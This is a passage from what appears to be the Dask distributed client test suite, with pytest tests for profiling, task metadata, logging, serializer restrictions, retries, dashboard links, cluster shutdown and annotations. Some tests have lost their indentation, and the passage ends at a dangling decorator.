@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
    """Per-key profiles sum to the total; unknown keys are empty and log nothing."""
    x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
    y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
    await wait(x + y)
    xp = await c.profile("slowinc")
    yp = await c.profile("slowdec")
    p = await c.profile()
    assert p["count"] == xp["count"] + yp["count"]
    with captured_logger(logging.getLogger("distributed")) as logger:
        prof = await c.profile("does-not-exist")
        assert prof == profile.create()
    out = logger.getvalue()
    assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
    """A name= passed to Client shows up in its id and in the scheduler logs."""
    with captured_logger("distributed.scheduler") as sio:
        client = await Client(s.address, asynchronous=True, name="foo")
        assert "foo" in client.id
        await client.close()
    text = sio.getvalue()
    assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
    """A Future built from just a key binds to the current default client."""
    x = c.submit(inc, 1)
    await wait(x)
    future = Future(x.key)
    assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
    """A second client learns the state of an existing key automatically."""
    x = c.submit(inc, 1)
    await wait(x)
    client = await Client(s.address, asynchronous=True)
    future = Future(x.key, client)
    while future.status != "finished":
        await asyncio.sleep(0.01)
    await client.close()
def test_client_async_before_loop_starts():
    """An asynchronous Client can be constructed before its loop is running."""
    with pristine_loop() as loop:
        client = Client(asynchronous=True, loop=loop)
        assert client.asynchronous
        client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
    """Tasks may call .compute() recursively on workers without deadlocking."""
    def fib(x):
        assert get_worker().get_current_task()
        if x < 2:
            return x
        a = delayed(fib)(x - 1)
        b = delayed(fib)(x - 2)
        c = a + b
        return c.compute()
    future = c.submit(fib, 8)
    result = await future
    assert result == 21
    assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
    """set_metadata/get_metadata support scalars, nested keys, defaults, cleanup."""
    await c.set_metadata("x", 1)
    result = await c.get_metadata("x")
    assert result == 1
    future = c.submit(inc, 1)
    key = future.key
    await wait(future)
    await c.set_metadata(key, 123)
    result = await c.get_metadata(key)
    assert result == 123
    # Metadata keyed by a task key is dropped when the task is forgotten
    del future
    while key in s.tasks:
        await asyncio.sleep(0.01)
    with pytest.raises(KeyError):
        await c.get_metadata(key)
    result = await c.get_metadata(key, None)
    assert result is None
    await c.set_metadata(["x", "a"], 1)
    result = await c.get_metadata("x")
    assert result == {"a": 1}
    await c.set_metadata(["x", "b"], 2)
    result = await c.get_metadata("x")
    assert result == {"a": 1, "b": 2}
    result = await c.get_metadata(["x", "a"])
    assert result == 1
    # Setting a deeper path replaces the intermediate scalar with nested dicts
    await c.set_metadata(["x", "a", "c", "d"], 1)
    result = await c.get_metadata("x")
    assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
    """get_scheduler_logs/get_worker_logs return logs tagged with their origin."""
    await wait(c.map(inc, range(5)))
    logs = await c.get_scheduler_logs(n=5)
    assert logs
    for _, msg in logs:
        assert "distributed.scheduler" in msg
    w_logs = await c.get_worker_logs(n=5)
    assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
    for log in w_logs.values():
        for _, msg in log:
            assert "distributed.worker" in msg
    n_logs = await c.get_worker_logs(nanny=True)
    assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
    for log in n_logs.values():
        for _, msg in log:
            assert "distributed.nanny" in msg
    # workers= filters by the worker address even when asking for nanny logs
    n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
    assert set(n_logs.keys()) == {a.worker_address}
    for log in n_logs.values():
        for _, msg in log:
            assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
    """Computing a delayed should not add an extra finalize task to the graph."""
    x = delayed(inc)(1)
    future = c.compute(x)
    result = await future
    assert result == 2
    assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
    """Client() picks up scheduler-address from dask config and logs it."""
    with dask.config.set({"scheduler-address": s.address}):
        with captured_logger("distributed.client") as sio:
            c = await Client(asynchronous=True)
            assert c.scheduler.address == s.address
    text = sio.getvalue()
    assert s.address in text
    await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
    """Submitting large inline values warns once with a truncated repr."""
    with warnings.catch_warnings(record=True) as record:
        future = c.submit(lambda x: x + 1, b"0" * 2000000)
    text = str(record[0].message)
    assert "2.00 MB" in text or "1.91 MiB" in text
    assert "large" in text
    assert "..." in text
    assert "'000" in text
    assert "000'" in text
    assert len(text) < 2000
    with warnings.catch_warnings(record=True) as record:
        data = b"0" * 2000000
        for i in range(10):
            future = c.submit(lambda x, y: x, data, i)
    # Repeated submissions of the same large value warn at most once
    assert len(record) < 2
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
    """Callables that are not hashable can still be submitted."""
    func = _UnhashableCallable()
    result = await c.submit(func, 1)
    assert result == 2
@gen_cluster()
async def test_client_name(s, a, b):
    """The client-name config value is embedded in the registered client id."""
    with dask.config.set({"client-name": "hello-world"}):
        c = await Client(s.address, asynchronous=True)
    assert any("hello-world" in name for name in list(s.clients))
    await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
    """A caller-supplied loop survives the client context manager and is reusable."""
    with Client(s["address"], loop=loop_in_thread) as c:
        assert c.submit(inc, 1).result() == 2
    with Client(s["address"], loop=loop_in_thread) as c:
        assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
    """Losing the scheduler should not surface BrokenPipeError in client logs."""
    c._periodic_callbacks["scheduler-info"].interval = 10
    with captured_logger(logging.getLogger("distributed.client")) as logger:
        await s.close()
        await c._update_scheduler_info()
    text = logger.getvalue()
    assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
    """The dashboard link template expands scheme/USER/port placeholders."""
    monkeypatch.setenv("USER", "myusername")
    with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            with dask.config.set(
                {"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
            ):
                link = "http://foo-myusername:12355/status"
                assert link == c.dashboard_link
                text = c._repr_html_()
                assert link in text
@gen_test()
async def test_dashboard_link_inproc():
    """An in-process cluster still renders a host-only dashboard link."""
    async with Client(processes=False, asynchronous=True, dashboard_address=":0") as c:
        with dask.config.set({"distributed.dashboard.link": "{host}"}):
            assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
    """With a tiny connect timeout, Client fails fast and ends up closed."""
    with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
        start = time()
        c = Client("127.0.0.1:3755", asynchronous=True)
        with pytest.raises((TimeoutError, IOError)):
            await c
        stop = time()
        assert c.status == "closed"
        await c.close()
        assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
    """Connecting to a live HTTP server that is not a scheduler times out cleanly."""
    import tornado.httpserver
    import tornado.web
    application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
    http_server = tornado.httpserver.HTTPServer(application)
    http_server.listen(8080)
    with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
        c = Client("127.0.0.1:8080", asynchronous=True)
        with pytest.raises((TimeoutError, IOError)):
            await c
        await c._close(fast=True)
    http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
    """With serializers limited to dask/msgpack, pickle-requiring payloads raise."""
    @gen_cluster()
    async def test(s, a, b):
        np = pytest.importorskip("numpy")
        async with Client(
            s.address, asynchronous=True, serializers=["dask", "msgpack"]
        ) as c:
            assert (await c.submit(inc, 1)) == 2
            await c.submit(np.ones, 5)
            await c.scatter(1)
            # Can't send complex data
            with pytest.raises(TypeError):
                future = await c.scatter(inc)
            # can send complex tasks (this uses pickle regardless)
            future = c.submit(lambda x: x, inc)
            await wait(future)
            # but can't receive complex results
            with pytest.raises(TypeError):
                await c.gather(future, direct=direct)
            # Run works
            result = await c.run(lambda: 1)
            assert list(result.values()) == [1, 1]
            result = await c.run_on_scheduler(lambda: 1)
            assert result == 1
            # But not with complex return values
            with pytest.raises(TypeError):
                await c.run(lambda: inc)
            with pytest.raises(TypeError):
                await c.run_on_scheduler(lambda: inc)
    test()
@gen_cluster()
async def test_de_serialization(s, a, b):
    """A client that can pickle outbound but not inbound fails on retrieval."""
    np = pytest.importorskip("numpy")
    c = await Client(
        s.address,
        asynchronous=True,
        serializers=["msgpack", "pickle"],
        deserializers=["msgpack"],
    )
    try:
        # Can send complex data
        future = await c.scatter(np.ones(5))
        # But can not retrieve it
        with pytest.raises(TypeError):
            result = await future
    finally:
        await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
    """deserializers=["msgpack"] alone blocks receiving pickled results."""
    np = pytest.importorskip("numpy")
    c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
    try:
        # Can send complex data
        future = await c.scatter(np.ones(5))
        # But can not retrieve it
        with pytest.raises(TypeError):
            result = await future
    finally:
        await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
    """_repr_html_ must not raise on a closed client."""
    c = await Client(s.address, asynchronous=True)
    await c.close()
    c._repr_html_()
def test_client_repr_closed_sync(loop):
    """Synchronous variant: repr of a closed client must not raise."""
    with Client(loop=loop, processes=False, dashboard_address=":0") as c:
        pass
    c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
    """Scheduler priorities follow dask.order for tuple-keyed tasks."""
    x = delayed(inc)(1, dask_key_name=("a", 2))
    y = delayed(inc)(2, dask_key_name=("a", 10))
    o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
    fx, fy = c.compute([x, y])
    await wait([fx, fy])
    assert (o[x.key] < o[y.key]) == (
        s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
    )
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
    """An error in a consumer of scattered data must not cancel the errored state."""
    # https://github.com/dask/distributed/issues/2038
    def bad_fn(x):
        raise Exception("lol")
    x = await c.scatter(1)
    y = c.submit(bad_fn, x)
    del x
    await wait(y)
    assert y.status == "error"
    await asyncio.sleep(0.1)
    assert y.status == "error"  # not cancelled
@pytest.mark.parametrize("workers_arg", [False, True])
@pytest.mark.parametrize("direct", [False, True])
@pytest.mark.parametrize("broadcast", [False, True, 10])
@gen_cluster(client=True, nthreads=[("", 1)] * 10)
async def test_scatter_and_replicate_avoid_paused_workers(
    c, s, *workers, workers_arg, direct, broadcast
):
    """scatter and replicate skip paused workers; only workers 3 and 7 get data."""
    paused_workers = [w for i, w in enumerate(workers) if i not in (3, 7)]
    for w in paused_workers:
        w.memory_pause_fraction = 1e-15
    while any(s.workers[w.address].status != Status.paused for w in paused_workers):
        await asyncio.sleep(0.01)
    f = await c.scatter(
        {"x": 1},
        workers=[w.address for w in workers[1:-1]] if workers_arg else None,
        broadcast=broadcast,
        direct=direct,
    )
    if not broadcast:
        await c.replicate(f, n=10)
    expect = [i in (3, 7) for i in range(10)]
    actual = [("x" in w.data) for w in workers]
    assert actual == expect
@pytest.mark.xfail(reason="GH#5409 Dask-Default-Threads are frequently detected")
def test_no_threads_lingering():
    """Fail loudly (with a thread dump) if earlier tests leaked many threads."""
    if threading.active_count() < 40:
        return
    active = dict(threading._active)
    print(f"==== Found {len(active)} active threads: ====")
    for t in active.values():
        print(t)
    assert False
@gen_cluster()
async def test_direct_async(s, a, b):
    """The direct_to_workers flag is stored as given on asynchronous clients."""
    c = await Client(s.address, asynchronous=True, direct_to_workers=True)
    assert c.direct_to_workers
    await c.close()
    c = await Client(s.address, asynchronous=True, direct_to_workers=False)
    assert not c.direct_to_workers
    await c.close()
def test_direct_sync(c):
    """Worker-side clients talk directly to workers even when the submitting
    client does not."""
    # The externally created client is not direct-to-workers...
    assert not c.direct_to_workers
    def worker_side_flag():
        # ...but the client obtained inside a running task is.
        return get_client().direct_to_workers
    flag = c.submit(worker_side_flag).result()
    assert flag
@gen_cluster()
async def test_mixing_clients(s, a, b):
    """Futures from one client cannot be submitted through another."""
    c1 = await Client(s.address, asynchronous=True)
    c2 = await Client(s.address, asynchronous=True)
    future = c1.submit(inc, 1)
    with pytest.raises(ValueError):
        c2.submit(inc, future)
    assert not c2.futures  # Don't create Futures on second Client
    await c1.close()
    await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
    """Tuple-valued dask keys survive compute round-trips."""
    x = dask.delayed(inc)(1, dask_key_name=("x", 1))
    y = dask.delayed(inc)(x, dask_key_name=("y", 1))
    future = c.compute(y)
    assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
    """Concurrent direct scatters of the same value do not interfere."""
    futures = await asyncio.gather(*(c.scatter(1, direct=True) for _ in range(5)))
    x = await futures[0]
    x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
    """A large kwarg is stored once as its own task, shared by all mapped tasks."""
    np = pytest.importorskip("numpy")
    x = np.random.random(100000)
    futures = c.map(lambda a, b: a + b, range(100), b=x)
    while not s.tasks:
        await asyncio.sleep(0.01)
    # 100 map tasks plus a single task holding the large array
    assert len(s.tasks) == 101
    assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
    """Future.retry reruns a failed task, picking up changed config."""
    def f():
        assert dask.config.get("foo")
    with dask.config.set(foo=False):
        future = c.submit(f)
        with pytest.raises(AssertionError):
            await future
    with dask.config.set(foo=True):
        await future.retry()
        await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
    """Retrying a task whose dependency failed also reruns the dependency."""
    def f():
        return dask.config.get("foo")
    x = c.submit(f)
    y = c.submit(inc, x)
    with pytest.raises(KeyError):
        await y
    with dask.config.set(foo=100):
        await y.retry()
        result = await y
        assert result == 101
        # Retrying either the dependent or the dependency is idempotent
        await y.retry()
        await x.retry()
        result = await y
        assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
    """Retry works even when the failed task's dependency was released."""
    def f(x):
        return dask.config.get("foo") + 1
    x = c.submit(inc, 1, key="x")
    y = c.submit(f, x, key="y")
    del x
    with pytest.raises(KeyError):
        await y
    with dask.config.set(foo=100):
        await y.retry()
        result = await y
        assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
    """profile(plot=True) returns a bokeh Model and can write an HTML file."""
    pytest.importorskip("bokeh.plotting")
    from bokeh.model import Model
    await c.gather(c.map(slowinc, range(10), delay=0.2))
    state, figure = await c.profile(plot=True)
    assert isinstance(figure, Model)
    with tmpfile("html") as fn:
        try:
            await c.profile(filename=fn)
        except PermissionError:
            if WINDOWS:
                pytest.xfail()
        assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
    """With ``direct_to_workers=True`` the client fetches data straight from
    workers, so the scheduler should record no 'gather' events."""
    with Client(s["address"], loop=loop, direct_to_workers=True) as client:
        future = client.scatter(1)
        future.result()
        resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
        assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
    """The weakref instance registries on Client/Scheduler/Worker track
    exactly the live objects of this cluster."""
    assert list(Client._instances) == [c]
    assert list(Scheduler._instances) == [s]
    assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
    """``Client.wait_for_workers`` blocks until n_workers are present and
    raises a helpful TimeoutError when the target is not reached in time."""
    future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
    await asyncio.sleep(0.22)  # 2 chances
    # Only 2 workers exist, so the waiter must still be pending
    assert not future.done()
    w = await Worker(s.address)
    start = time()
    await future
    # A third worker joining unblocks the waiter near-immediately
    assert time() < start + 1
    await w.close()
    with pytest.raises(TimeoutError) as info:
        await c.wait_for_workers(n_workers=10, timeout="1 ms")
    # The error message reports progress ("2/10") and echoes the timeout
    assert "2/10" in str(info.value).replace(" ", "")
    assert "1 ms" in str(info.value)
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
before = proc.num_fds()
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address), Worker(s.address), Client(
s.address, asynchronous=True
):
assert proc.num_fds() > before
await df.sum().persist()
start = time()
while proc.num_fds() > before:
await asyncio.sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_test()
async def test_dashboard_link_cluster():
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(
processes=False, asynchronous=True, dashboard_address=":0"
) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@gen_test()
async def test_shutdown():
    """``Client.shutdown`` tears down the scheduler and its workers, not
    just the client connection."""
    async with Scheduler(dashboard_address=":0") as s:
        async with Worker(s.address) as w:
            async with Client(s.address, asynchronous=True) as c:
                await c.shutdown()
            assert s.status == Status.closed
            assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(
n_workers=1, asynchronous=True, processes=False, dashboard_address=":0"
) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == Status.closed
@gen_test()
async def test_config_inherited_by_subprocess():
with dask.config.set(foo=100):
async with LocalCluster(
n_workers=1,
asynchronous=True,
processes=True,
dashboard_address=":0",
) as lc:
async with Client(lc, asynchronous=True) as c:
assert await c.submit(dask.config.get, "foo") == 100
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@pytest.mark.flaky(reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
    """Futures can be awaited directly from async code, yielding the result
    or re-raising the task's exception."""
    future = c.submit(inc, 1)
    async def f():  # flake8: noqa
        result = await future
        assert result == 2
    await f()
    future = c.submit(div, 1, 0)
    # Awaiting a failed future re-raises the task's original exception
    async def f():
        with pytest.raises(ZeroDivisionError):
            await future
    await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
@gen_test()
async def test_async_with():
async with Client(processes=False, dashboard_address=":0", asynchronous=True) as c:
assert await c.submit(lambda x: x + 1, 10) == 11
assert c.status == "closed"
assert c.cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@pytest.mark.skipif(WINDOWS, reason="frequently kills off the whole test suite")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
    pytest.importorskip("bokeh")
    da = pytest.importorskip("dask.array")
    async def f(stacklevel, mode=None):
        """
        We wrap this in a function so that the assertions aren't in the
        performance report itself
        Also, we want this comment to appear
        """
        x = da.random.random((1000, 1000), chunks=(100, 100))
        with tmpfile(extension="html") as fn:
            async with performance_report(
                filename=fn, stacklevel=stacklevel, mode=mode
            ):
                await c.compute((x + x.T).sum())
            with open(fn) as f:
                data = f.read()
        return data
    # Ensure the default kwarg maintains backward compatibility
    data = await f(stacklevel=1)
    assert "Also, we want this comment to appear" in data
    assert "bokeh" in data
    assert "random" in data
    assert "Dask Performance Report" in data
    assert "x = da.random" in data
    assert "Threads: 4" in data
    assert "distributed.scheduler - INFO - Clear task state" in data
    assert dask.__version__ in data
    # stacklevel=2 captures code two frames back -- which in this case
    # is the testing function
    data = await f(stacklevel=2)
    assert "async def test_performance_report(c, s, a, b):" in data
    assert "Dask Performance Report" in data
    # stacklevel=0 or lower is overridden to stacklevel=1 so we don't see
    # distributed internals
    data = await f(stacklevel=0)
    assert "Also, we want this comment to appear" in data
    assert "Dask Performance Report" in data
    data = await f(stacklevel=1, mode="inline")
    assert "cdn.bokeh.org" not in data
    data = await f(stacklevel=1, mode="cdn")
    assert "cdn.bokeh.org" in data
@gen_cluster(nthreads=[])
async def test_client_gather_semaphore_loop(s):
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_mixed_compression(s):
pytest.importorskip("lz4")
da = pytest.importorskip("dask.array")
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": None}
):
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
):
async with Client(s.address, asynchronous=True) as c:
await c.get_versions()
x = da.ones((10000, 10000))
y = x + x.T
await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
"""Regression test of <https://github.com/dask/distributed/issues/4145>"""
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
ddf = dd.from_pandas(
pd.DataFrame(
dict(
uid=range(50),
enter_time=pd.date_range(
start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
),
)
),
npartitions=5,
)
ddf = ddf[ddf.uid.isin(range(29))].persist()
ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
ddf["day"] = ddf.enter_time.dt.day_name()
ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
async with get_task_metadata() as tasks:
f = c.submit(slowinc, 1)
await f
metadata = tasks.metadata
assert f.key in metadata
assert metadata[f.key] == s.tasks.get(f.key).metadata
state = tasks.state
assert f.key in state
assert state[f.key] == "memory"
assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
# Ensure that get_task_metadata only collects metadata for
# tasks which are submitted and completed within its context
async with get_task_metadata() as tasks1:
f1 = c.submit(slowinc, 1)
await f1
async with get_task_metadata() as tasks2:
f2 = c.submit(slowinc, 2)
await f2
metadata1 = tasks1.metadata
metadata2 = tasks2.metadata
assert len(metadata1) == 2
assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
assert len(metadata2) == 1
assert list(metadata2.keys()) == [f2.key]
assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
# Log an event from inside a task
def foo():
get_worker().log_event("topic1", {"foo": "bar"})
assert not await c.get_events("topic1")
await c.submit(foo)
events = await c.get_events("topic1")
assert len(events) == 1
assert events[0][1] == {"foo": "bar"}
# Log an event while on the scheduler
def log_scheduler(dask_scheduler):
dask_scheduler.log_event("topic2", {"woo": "hoo"})
await c.run_on_scheduler(log_scheduler)
events = await c.get_events("topic2")
assert len(events) == 1
assert events[0][1] == {"woo": "hoo"}
# Log an event from the client process
await c.log_event("topic2", ("alice", "bob"))
events = await c.get_events("topic2")
assert len(events) == 2
assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(qux="bar", priority=100):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(
{"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
)
@pytest.mark.parametrize("fn", ["compute", "persist"])
def test_annotations_compute_time(fn):
da = pytest.importorskip("dask.array")
@gen_cluster(client=True)
async def test(c, s, a, b):
x = da.ones(10, chunks=(5,))
with dask.annotate(foo="bar"):
# Turn off optimization to avoid rewriting layers and picking up annotations
# that way. Instead, we want `compute`/`persist` to be able to pick them up.
x = await getattr(c, fn)(x, optimize_graph=False)
assert all({"foo": "bar"} == ts.annotations for ts in s.tasks.values())
test()
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(foo="bar"):
x = da.ones(10, chunks=(5,))
ann = x.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
(xx,) = dask.optimize(x)
ann = xx.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
